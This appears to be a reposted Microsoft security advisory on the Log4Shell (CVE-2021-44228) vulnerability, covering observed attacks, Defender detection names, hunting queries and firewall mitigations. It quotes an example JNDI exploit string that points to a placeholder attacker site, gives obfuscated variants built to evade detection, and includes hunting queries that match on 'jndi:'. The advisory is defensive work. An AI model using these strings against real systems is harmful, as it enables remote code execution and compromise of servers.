Posted December 12, 20212 yr Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”. The vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component. For more technical and mitigation information about the vulnerability, please read the Microsoft Security Response Center blog. The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following: ${jndi:ldap://[attacker site]/a} An attacker performs a https request against their target system which generates a log using Log4j that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability will then be to causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems. The specially crafted string that enables execution of this vulnerability can be identified through several components. The string contains “jndi”, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as “ldap”, “ldaps”, “rmi”, “dns”, “iiop”, or “http”, precedes the attacker domain. As security teams work to detect the exploitation of the vulnerability, attackers have added obfuscation to these requests to evade detections based on request patterns. We’ve seen things like running a lower or upper command within the exploitation string ({jndi:${lower:l}${lower:d}a${lower:p}) and even more complicated obfuscation attempts (${${::-j}${::-n}${::-d}${::-i}) that are all trying to bypass string-matching detections. At the time of publication, the vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems. Microsoft security solutions help protect against and detect attacks Microsoft 365 Defender Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants. Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names: On Windows: Trojan:Win32/Capfetox.AA – detects attempted exploitation on the attacker machine Trojan:Win64/DisguiseXMRigMiner – detection for coin mining post exploitation payloads HackTool:Win32/Capfetox.A!dha – detects attempted exploitation on the attacker machine VirTool:Win64/CobaltSrike.A, TrojanDropper:PowerShell/Cobacis.A – detects Cobalt Strike Beacon loaders On Linux: Trojan:Linux/SuspectJavaExploit.A, Trojan:Linux/SuspectJavaExploit.B, Trojan:Linux/SuspectJavaExploit.C – blocks Java processes downloading and executing payload through output redirection Trojan:Linux/BashMiner.A – detects post-exploitation cryptocurrency miner Exploit:Linux/CVE-2021-44228.A, Exploit:Linux/CVE-2021-44228.B – detects exploitation Users of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat. Block executable files from running unless they meet a prevalence, age, or trusted list criterion Due to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections. Alerts with the following titles in the Security Center can indicate threat activity on your network: Possible Log4j exploitation Suspicious script launched (detects multiple behaviors, including suspicious command launch post exploitation) Microsoft 365 Defender advanced hunting queries To locate possible exploitation activity, run the following queries: Possible Malicious Indicators in Cloud Application Events This query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers’ details such as IP address, Payload string, Download URL, etc. CloudAppEvents | where Timestamp > datetime(“2021-12-09”) | where UserAgent contains “jndi:” or AccountDisplayName contains “jndi:” or Application contains “jndi:” or AdditionalFields contains “jndi:” | project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields Possible vulnerable applications via M365D Threat and Vulnerability Management This query looks for possibly vulnerable applications using the affected Log4j component. Please triage the results to determine applications and programs that may need to be patched and updated. DeviceTvmSoftwareInventory | where SoftwareName contains “log4j” | project DeviceName, SoftwareName, SoftwareVersion Surfacing possibly vulnerable devices using Advanced Hunting Finding possible vulnerable applications and devices via software inventory Customers can also surface possibly vulnerable devices via Threat and Vulnerability Management capability in Microsoft Defender for Endpoint as part of Microsoft 365 Defender. Surfacing possibly vulnerable devices using Software Inventory Microsoft Defender for Cloud The following are the current Microsoft Defender for Cloud detections: On Windows Detected obfuscated command line Suspicious use of PowerShell detected On Linux Suspicious file download Possible Cryptocoinminer download detected Process associated with digital currency mining detected Potential crypto coin miner started Microsoft Sentinel queries Possible exploitation of Apache log4j component detected This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component. Crypto currency miners EXECVE This query hunts through EXECVE syslog data generated by AUOMS to find instances of crypto currency miners being downloaded. It returns a table of suspicious command lines. Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: Microsoft-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell at master · OTRF/Microsoft-Sentinel2Go RiskIQ EASM and Threat Intelligence View Threat Intelligence on this CVE, including mitigation guidance and IOCs, here. Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it’s possible to surface all observed instances of Apache or Java, including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you. For a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the Attack Surface Intelligence Dashboard Log4J Insights tab. Azure Firewall Premium Customers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium. Recommendation: Customers are recommended to configure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2021-44228 exploit. Customers using Azure Firewall Standard can migrate to Premium by following these directions. Customers new to Azure Firewall premium can learn more about Firewall Premium. Indicators of compromise (IOCs) Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: Azure-Sentinel/Log4J_IPIOC_Dec112021.yaml at master · Azure/Azure-Sentinel Microsoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available. The post Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation appeared first on Microsoft Security Blog. Continue reading...
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